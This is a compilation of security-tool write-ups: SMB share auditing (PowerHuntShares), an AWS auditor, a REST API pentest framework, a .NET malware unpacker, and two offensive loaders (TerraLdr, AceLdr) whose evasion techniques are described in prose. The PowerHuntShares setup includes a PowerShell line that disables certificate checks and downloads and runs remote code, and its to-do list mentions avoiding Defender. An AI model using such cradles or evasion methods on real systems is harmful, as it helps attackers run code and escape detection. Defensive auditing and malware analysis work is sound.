      - symbol: system/dmesg_restrict
        expected_value: 1
        size: 4
      - symbol: system/modules_disabled
        expected_value: 0
        size: 4
      - symbol: system/ftrace_enabled
        expected_value: 1
        size: 4
      - symbol: system/ftrace_disabled
        expected_value: 0
        size: 4
      - symbol: system/sysctl_protected_fifos
        expected_value: 1
        size: 4
      - symbol: system/sysctl_protected_hardlinks
        expected_value: 1
        size: 4
      - symbol: system/sysctl_protected_regular
        expected_value: 2
        size: 4
      - symbol: system/sysctl_protected_symlinks
        expected_value: 1
        size: 4
      - symbol: system/sysctl_unprivileged_userfaultfd
        expected_value: 0
        size: 4

  ## action taken when a register_check fails on a sensitive kernel space hook point
  register_check: log

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains


PowerHuntShares is designed to automatically inventory, analyze, and report excessive privileges assigned to SMB shares on Active Directory domain-joined computers.
It is intended to help IAM and other blue teams gain a better understanding of their SMB share attack surface, and provides data insights that naturally group related shares to help streamline remediation efforts at scale.


It supports functionality to:

  • Authenticate using the current user context, a credential, or clear text user/password.
  • Discover accessible systems associated with an Active Directory domain automatically. It will also filter Active Directory computers based on available open ports.
  • Target a single computer, list of computers, or discovered Active Directory computers (default).
  • Collect SMB share ACL information from target computers using PowerShell.
  • Analyze collected Share ACL data.
  • Report summary reports and excessive privilege details in HTML and CSV file formats.

Excessive SMB share ACLs are a systemic problem and an attack surface that all organizations struggle with. The goal of this project is to provide a proof of concept that works towards building a better share collection and data insight engine that can help inform and prioritize remediation efforts.

Bonus Features:

  • Generate directory listing dump for configurable depth
  • Search for file types across discovered shares

I've also put together a short presentation outlining some of the common misconfigurations and strategies for prioritizing remediation here: https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721

Vocabulary

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges
Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. All provide domain users access to the affected shares due to privilege inheritance issues. Note there is a parameter that allows operators to add their own target groups.
Below is some additional background:

  • Everyone is a direct reference that applies to both unauthenticated and authenticated users. Typically only a null session is required to access those resources.
  • BUILTIN\Users contains Authenticated Users
  • Authenticated Users contains Domain Users on domain joined systems. That's why Domain Users can access a share when the share permissions have been assigned to "BUILTIN\Users".
  • Domain Users is a direct reference
  • Domain Users can also create up to 10 computer accounts by default that get placed in the Domain Computers group
  • Domain Users that have local administrative access to a domain joined computer can also impersonate the computer account.
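
To illustrate how that group list can drive classification (a minimal sketch in Python for illustration only; PowerHuntShares itself is PowerShell and its matching logic may differ):

# flag_excessive_ace.py - illustrative only
EXCESSIVE_IDENTITIES = {
    "everyone",
    "authenticated users",
    "builtin\\users",
    "domain users",
    "domain computers",
}

def is_excessive(ace_identity: str) -> bool:
    name = ace_identity.strip().lower()
    short = name.split("\\")[-1]  # e.g. "demo\\domain users" -> "domain users"
    return name in EXCESSIVE_IDENTITIES or short in {
        "everyone", "authenticated users", "domain users", "domain computers"
    }

print(is_excessive("DEMO\\Domain Users"))  # True
print(is_excessive("DEMO\\ShareAdmins"))   # False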

Please Note: Share permissions can be overruled by NTFS permissions. Also, be aware that testing excluded share names containing the following keywords:

print$, prnproc$, printer, netlogon, and sysvol

High Risk Shares
In the context of this report, high risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes the shares

 wwwroot, inetpub, c$, and admin$   
However, additional exposures may exist that are not called out beyond that.

Setup Commands

Below is a list of commands that can be used to load PowerHuntShares into your current PowerShell session. Please note that one of these will have to be run each time PowerShell is run; it is not persistent.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

# Import module that exists in the current directory
Import-Module .\PowerHuntShares.psm1

or

# Reduce SSL operating level to support connection to github
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

Example Commands

Important Note: All commands should be run as an unprivileged domain user.

.EXAMPLE 1: Run from a domain computer. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

.EXAMPLE 2: Run from a domain computer with alternative domain credentials. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

.EXAMPLE 3: Run from a domain computer as current user. Target hosts in a file. One per line.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -HostList c:\temp\hosts.txt

.EXAMPLE 4: Run from a non-domain computer with credential. Performs Active Directory computer discovery by default.
C:\temp\test> runas /netonly /user:domain\user PowerShell.exe
PS C:\temp\test> Import-Module Invoke-HuntSMBShares.ps1
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user

===============================================================
PowerHuntShares
===============================================================
This function automates the following tasks:

o Determine current computer's domain
o Enumerate domain computers
o Filter for computers that respond to ping requests
o Filter for computers that have TCP 445 open and accessible
o Enumerate SMB shares
o Enumerate SMB share permissions
o Identify shares with potentially excessive privileges
o Identify shares that provide read & write access
o Identify shares that are high risk
o Identify common share owners, names, & directory listings
o Generate creation, last written, & last accessed timelines
o Generate html summary report and detailed csv files

Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
---------------------------------------------------------------
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems..
[*][03/01/2021 09:37] Scan Complete
---------------------------------------------------------------
SHARE ANALYSIS
---------------------------------------------------------------
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
---------------------------------------------------------------
SHARE REPORT SUMMARY
---------------------------------------------------------------
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37] because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37] - 4 backup
[*][03/01/2021 09:37] - 2 ssms
[*][03/01/2021 09:37] - 1 test2
[*][03/01/2021 09:37] - 1 test1
[*][03/01/2021 09:37] - 1 users
[*] -----------------------------------------------

HTML Report Examples

Credits

Author
Scott Sutherland (@_nullbind)

Open-Source Code Used
These individuals wrote open-source code that was used as part of this project. A big thank you goes out to them and their work!

Name Site
Will Schroeder (@harmj0y) https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Warren F (@pscookiemonster) https://github.com/RamblingCookieMonster/Invoke-Parallel
Luben Kirov http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/

License
BSD 3-Clause

Todos

Pending Fixes/Bugs

  • Update code to avoid defender
  • Fix file listing formatting on data insight pages
  • IPv6 addresses don't show up in subnets summary
  • ACLs associated with Builtin\Users sometimes show up as LocalSystem under undefined conditions and, as a result, don't show up in the Excessive Privileges export. - Thanks Sam!

Pending Features

  • Add ability to specify additional groups to target
  • Add directory listing to insights page.
  • Add ability to grab system OS information for data insights.
  • Add visualization: visual squares with coloring mapped to share volume density by subnet or IP.
  • Add file type search. (half coded) + add to data insights. Don't forget things like *.aws, *.azure *.gcp directories that store cloud credentials.
  • Add file content search.
  • Add DontExcludePrintShares option
  • Add auto targeting of groups that contain a large % of the user population; over 70% (make configurable). Add as option.
  • Add configuration fix: for netlogon and sysvol you may get access denied when using Windows 10 unless the setting below is configured. Automate a check for this, and attempt to modify it if privileges are at the correct level. In gpedit.msc, go to Computer -> Administrative Templates -> Network -> Network Provider -> Hardened UNC Paths, enable the policy and click the "Show" button. Enter your server name (* for all servers) into "Value name" and enter the following text "RequireMutualAuthentication=0,RequireIntegrity=0,RequirePrivacy=0" without quotes into the "Value" field.
  • Add an interesting shares based on names to data insights. example: sql, backup, password, etc.
  • Add active sessions data to help identify potential owners/users of share.
  • Pull spns and computer description/spn account descriptions to help identify owner/business unit.
  • Create bloodhound import file / edge (highrisk share)
  • Research to identify additional high risk share names based on common technology
  • Add better support for IPv6
  • Dynamic identification of spikes in high risk share creation/common groupings, need to better summarize supporting detail beyond just the timeline. For each of the data insights, add average number of shares created for insight grouping by year/month (for folder hash / name etc), and the increase the month/year it spikes. (attempt to provide some historical context); maybe even list the most common non default directories being used by each of those. Potentially adding "first seen date" as well.
  • Add showing share permissions (along with the already displayed NTFS permissions) and resultant access (most restrictive wins)


TerraLdr - A Payload Loader Designed With Advanced Evasion Features


TerraLdr: A Payload Loader Designed With Advanced Evasion Features

Details:

  • no crt functions imported
  • syscall unhooking using KnownDllUnhook
  • api hashing using Rotr32 hashing algo
  • payload encryption using rc4 - payload is saved in .rsrc
  • process injection - targeting 'SettingSyncHost.exe'
  • ppid spoofing & blockdlls policy using NtCreateUserProcess
  • stealthy remote process injection - chunking
  • using debugging & NtQueueApcThread for payload execution

Usage:

Thanks For:

Notes:

  • "SettingSyncHost.exe" isnt found on windows 11 machine, while i didnt tested with w11, its a must to change the process name to something else before testing
  • it is possibly better to compile with "ISO C++20 Standard (/std:c++20)"

Profit:

Demo (by @ColeVanlanding1) :


Tested with Cobalt Strike && Havoc on Windows 10



YATAS - A Simple Tool To Audit Your AWS Infrastructure For Misconfiguration Or Potential Security Issues With Plugins Integration


Yet Another Testing & Auditing Solution

The goal of YATAS is to help you create a secure AWS environment without too much hassle. It won't check for all best practices but only for the ones that are important for you based on my experience. Please feel free to tell me if you find something that is not covered.


Features

YATAS is a simple and easy to use tool to audit your infrastructure for misconfiguration or potential security issues.

Screenshots: output without details / output with --details

Installation

brew tap padok-team/tap
brew install yatas
yatas --init

Modify .yatas.yml to your needs.

yatas --install

Installs the plugins you need.

Usage

yatas -h

Flags:

  • --details: Show details of the issues found.
  • --compare: Compare the results of the previous run with the current run and show the differences.
  • --ci: Exit code 1 if there are issues found, 0 otherwise.
  • --resume: Only shows the number of tests passing and failing.
  • --time: Shows the time each test took to run in order to help you find bottlenecks.
  • --init: Creates a .yatas.yml file in the current directory.
  • --install: Installs the plugins you need.
  • --only-failure: Only show the tests that failed.

Plugins

Plugins Description Checks
AWS Audit AWS checks Good practices and security checks
Markdown Reports Reporting Generates a markdown report

Checks

Ignore results for known issues

You can ignore results of checks by adding the following to your .yatas.yml file:

ignore:
  - id: "AWS_VPC_004"
    regex: true
    values:
      - "VPC Flow Logs are not enabled on vpc-.*"
  - id: "AWS_VPC_003"
    regex: false
    values:
      - "VPC has only one gateway on vpc-08ffec87e034a8953"

Exclude a test

You can exclude a test by adding the following to your .yatas.yml file:

plugins:
  - name: "aws"
    enabled: true
    description: "Check for AWS good practices"
    exclude:
      - AWS_S3_001

Specify which tests to run

To only run a specific test, add the following to your .yatas.yml file:

plugins:
  - name: "aws"
    enabled: true
    description: "Check for AWS good practices"
    include:
      - "AWS_VPC_003"
      - "AWS_VPC_004"

Get error logs

You can get the error logs by adding the following to your env variables:

export YATAS_LOG_LEVEL=debug

The available log levels are: debug, info, warn, error, fatal, and panic; logging is off by default.

AWS - 63 Checks

AWS Certificate Manager

  • AWS_ACM_001 ACM certificates are valid
  • AWS_ACM_002 ACM certificate expires in more than 90 days
  • AWS_ACM_003 ACM certificates are used

APIGateway

  • AWS_APG_001 ApiGateways logs are sent to Cloudwatch
  • AWS_APG_002 ApiGateways are protected by an ACL
  • AWS_APG_003 ApiGateways have tracing enabled

AutoScaling

  • AWS_ASG_001 Autoscaling maximum capacity is below 80%
  • AWS_ASG_002 Autoscaling group are in two availability zones

Backup

  • AWS_BAK_001 EC2's Snapshots are encrypted
  • AWS_BAK_002 EC2's snapshots are younger than a day old

Cloudfront

  • AWS_CFT_001 Cloudfronts enforce TLS 1.2 at least
  • AWS_CFT_002 Cloudfronts only allow HTTPS or redirect to HTTPS
  • AWS_CFT_003 Cloudfronts queries are logged
  • AWS_CFT_004 Cloudfronts are logging Cookies
  • AWS_CFT_005 Cloudfronts are protected by an ACL

CloudTrail

  • AWS_CLD_001 Cloudtrails are encrypted
  • AWS_CLD_002 Cloudtrails have Global Service Events Activated
  • AWS_CLD_003 Cloudtrails are in multiple regions

COG

  • AWS_COG_001 Cognito allows unauthenticated users

DynamoDB

  • AWS_DYN_001 Dynamodbs are encrypted
  • AWS_DYN_002 Dynamodb have continuous backup enabled with PITR

EC2

  • AWS_EC2_001 EC2s don't have a public IP
  • AWS_EC2_002 EC2s have the monitoring option enabled

ECR

  • AWS_ECR_001 ECRs image are scanned on push
  • AWS_ECR_002 ECRs are encrypted
  • AWS_ECR_003 ECRs tags are immutable

EKS

  • AWS_EKS_001 EKS clusters have logging enabled
  • AWS_EKS_002 EKS clusters have private endpoint or strict public access

LoadBalancer

  • AWS_ELB_001 ELB have access logs enabled

GuardDuty

  • AWS_GDT_001 GuardDuty is enabled in the account

IAM

  • AWS_IAM_001 IAM Users have 2FA activated
  • AWS_IAM_002 IAM access key younger than 90 days
  • AWS_IAM_003 IAM User can't elevate rights
  • AWS_IAM_004 IAM Users have not used their password for 120 days

Lambda

  • AWS_LMD_001 Lambdas are private
  • AWS_LMD_002 Lambdas are in a security group
  • AWS_LMD_003 Lambdas are not with errors

RDS

  • AWS_RDS_001 RDS are encrypted
  • AWS_RDS_002 RDS are backedup automatically with PITR
  • AWS_RDS_003 RDS have minor versions automatically updated
  • AWS_RDS_004 RDS aren't publicly accessible
  • AWS_RDS_005 RDS logs are exported to cloudwatch
  • AWS_RDS_006 RDS have the deletion protection enabled
  • AWS_RDS_007 Aurora Clusters have minor versions automatically updated
  • AWS_RDS_008 Aurora RDS are backedup automatically with PITR
  • AWS_RDS_009 Aurora RDS have the deletion protection enabled
  • AWS_RDS_010 Aurora RDS are encrypted
  • AWS_RDS_011 Aurora RDS logs are exported to cloudwatch
  • AWS_RDS_012 Aurora RDS aren't publicly accessible

S3 Bucket

  • AWS_S3_001 S3 are encrypted
  • AWS_S3_002 S3 buckets are not global but in one zone
  • AWS_S3_003 S3 buckets are versioned
  • AWS_S3_004 S3 buckets have a retention policy
  • AWS_S3_005 S3 bucket have public access block enabled

Volume

  • AWS_VOL_001 EC2's volumes are encrypted
  • AWS_VOL_002 EC2 are using GP3
  • AWS_VOL_003 EC2 have snapshots
  • AWS_VOL_004 EC2's volumes are unused

VPC

  • AWS_VPC_001 VPC CIDRs are bigger than /20
  • AWS_VPC_002 VPC can't be in the same account
  • AWS_VPC_003 VPC only have one Gateway
  • AWS_VPC_004 VPC Flow Logs are activated
  • AWS_VPC_005 VPC have at least 2 subnets

How to create a new plugin ?

You'd like to add a new plugin? Then simply visit yatas-plugin and follow the instructions.



AceLdr - Cobalt Strike UDRL For Memory Scanner Evasion


A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.


Features

Easy to Use

Import a single CNA script before generating shellcode.

Dynamic Memory Encryption

Creates a new heap for any allocations from Beacon and encrypts entries before sleep.

Code Obfuscation and Encryption

Changes the memory containing CS executable code to non-executable and encrypts it (FOLIAGE).

Return Address Spoofing at Execution

Certain WinAPI calls are executed with a spoofed return address (InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap).

Sleep Without Sleep

Delayed execution using WaitForSingleObjectEx.

RC4 Encryption

All encryption performed with SystemFunction032.
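For reference, SystemFunction032 is the undocumented Windows routine that implements RC4. The minimal pure-Python RC4 below (key scheduling plus keystream generation) is only meant to illustrate the cipher being referred to; it is not AceLdr's code, which calls the Windows routine directly.

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA): initialise and shuffle the state array with the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation (PRGA): XOR the keystream with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# RC4 is symmetric: applying it twice with the same key restores the plaintext
assert rc4(b"key", rc4(b"key", b"beacon data")) == b"beacon data"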

Known Issues

  • Not compatible with loaders that rely on the shellcode thread staying alive.

References

This project would not have been possible without the following:

Other features and inspiration were taken from the following:



REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs (see the sketch after this list)
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces
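To make the OpenAPI-driven test generation bullet above more concrete, the sketch below walks an OpenAPI 3.x description and enumerates the operations a test run could target. It is only an illustration: the file name petstore-openapi.json and the enumeration logic are hypothetical and are not REST-Attacker's actual interfaces.

import json

# Hypothetical OpenAPI 3.x document; any spec with a "paths" object works
with open("petstore-openapi.json") as handle:
    spec = json.load(handle)

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options"}

# (method, path) pairs - roughly the endpoints a generated test run would cover
operations = [
    (method.upper(), path)
    for path, item in spec.get("paths", {}).items()
    for method in item
    if method in HTTP_METHODS
]

for method, path in operations:
    print(f"{method:7} {path}")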

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python >3.10 to run the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code amendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files


An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.

The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.


Why DotDumper?

In brief, manual unpacking is a tedious process which consumes a disproportionate amount of time for analysts. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. The lost valuable time could be used to dig into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. After all, analysts look for the few needles in the haystack.

So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.

Features

To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumper's results of a packed AgentTesla stealer sample, the hashes of which are below.

Hash type Hash value
SHA-256 b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d
SHA-1 c10e48ee1f802f730f41f3d11ae9d7bcc649080c
MD-5 23541daadb154f1f59119952e7232d6b

Using the command-line interface

DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.

The minimal requirement to run a given sample is to provide the "-file" argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumper's executable location.

Unless a directory name is provided, the "-log" folder name is set equal to the file name of the sample without the extension (if any). The folder is located in the same folder as DotDumper resides in, and is where the logs and dumped files will be saved.

In the case of a library, or an alternative entry point into a binary, one must override the entry point using "-overrideEntry true". Additionally, one has to provide the fully qualified class, which includes the namespace, using "-fqcn My.NameSpace.MyClass". This tells DotDumper which class to select, which is where the provided function name (using "-functionName MyFunction") is retrieved.

If the selected function requires arguments, one has to provide the number of arguments using "-argc" and the number of required arguments. The argument types and values are to be provided as "string|myValue int|9". Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.

Other less frequently used options such as "-raceTime" or "-deprecated" are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.

Logging and dumping

Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:

  • A stack trace based on the function's caller
  • Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
  • The parent assembly, from which the call originates if it is not the original sample
  • The type, name, and value of the function's arguments
  • The type, name, and value of the function's return value, if any
  • A list of files which are dumped to disk which correspond with the given function call

Note that for each dumped file, the file name is equal to the file's SHA-256 hash.

To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNet's Assembly.Load function.

First, the local system time is given, together with the original function's return type, name, and argument(s). Second, the stack trace is given, where it shows that the sample's main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within "NavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)". This provides context for the analyst to find the code around this call if it is of interest.

Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.

Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.

Finally, the function's return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.

Reflection

Per Microsoft's documentation, reflection is best summarized as "[…] provides objects that encapsulate assemblies, modules, and types". In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.

To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.

Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sample's main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumper's invoke related hooks log these occurrences, as can be seen below.

The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.

Managed hooks

Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function which is referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead jump to the hook. As such, the program's execution flow is diverted. The hook can then perform arbitrary actions, optionally call the original function, after which it returns the execution to the caller together with a return value if need be. The diagram below illustrates this process.

Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Java's virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNet's interoperability service to call native Windows API functionality.
